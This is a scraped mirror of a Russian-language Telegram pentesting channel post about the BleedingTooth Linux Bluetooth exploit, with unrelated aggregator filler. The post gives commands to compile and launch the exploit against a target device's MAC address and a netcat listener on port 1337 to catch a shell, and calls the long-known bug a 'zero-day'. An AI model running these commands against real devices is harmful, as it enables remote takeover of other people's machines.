MANUAL_PENTESTING Telegram 1322
tgoop.com » United States » Security » Telegram web » Post 1322
Security
Forwarded from Security [private]
Media is too big
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой.

BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)

Компиляция:
 $ gcc -o exploit BleedingTooth.c -lbluetooth


Запуск:
 $ sudo ./exploit MAC-адрес атакуемого устройства


В другом терминале выполнить:
 $ nc -lvp 1337



При успешной эксплуатации для запуска калькулятора выполнится:
$ export XAUTHORITY=/run/user/1000/gdm/Xauthority
$ export DISPLAY=:0
$ gnome-calculator


Успешность: ~80% для целевой версии ядра.

Ограничения:
Bluetooth должен быть активен и доступен для подключения.
SELinux/AppArmor могут блокировать выполнение кода.
Современные ядра (после 5.15) не уязвимы.

Статья на хакере - Эксперты Google и Intel предупредили об опасных Bluetooth-багах в Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
www.tgoop.com/manual_pentesting/1321
2.72K views



tgoop.com/manual_pentesting/1322
Create:
Last Update:

Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой.

BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)

Компиляция:

 $ gcc -o exploit BleedingTooth.c -lbluetooth


Запуск:
 $ sudo ./exploit MAC-адрес атакуемого устройства


В другом терминале выполнить:
 $ nc -lvp 1337



При успешной эксплуатации для запуска калькулятора выполнится:
$ export XAUTHORITY=/run/user/1000/gdm/Xauthority
$ export DISPLAY=:0
$ gnome-calculator


Успешность: ~80% для целевой версии ядра.

Ограничения:
Bluetooth должен быть активен и доступен для подключения.
SELinux/AppArmor могут блокировать выполнение кода.
Современные ядра (после 5.15) не уязвимы.

Статья на хакере - Эксперты Google и Intel предупредили об опасных Bluetooth-багах в Linux

BY Security


Share with your friend now:
tgoop.com/manual_pentesting/1322

View MORE
Open in Telegram


Telegram News

Date: |

On June 7, Perekopsky met with Brazilian President Jair Bolsonaro, an avid user of the platform. According to the firm's VP, the main subject of the meeting was "freedom of expression." Hui said the messages, which included urging the disruption of airport operations, were attempts to incite followers to make use of poisonous, corrosive or flammable substances to vandalize police vehicles, and also called on others to make weapons to harm police. Over 33,000 people sent out over 1,000 doxxing messages in the group. Although the administrators tried to delete all of the messages, the posting speed was far too much for them to keep up. Hashtags Each account can create up to 10 public channels
from us


Это эксплойт для уязвимости нулевого дня в ядре Linux

 Security TG
web: 1322
Security.Telegram web
Security Telegram TG Channel
Telegram Updated:
Telegram Security
FROM American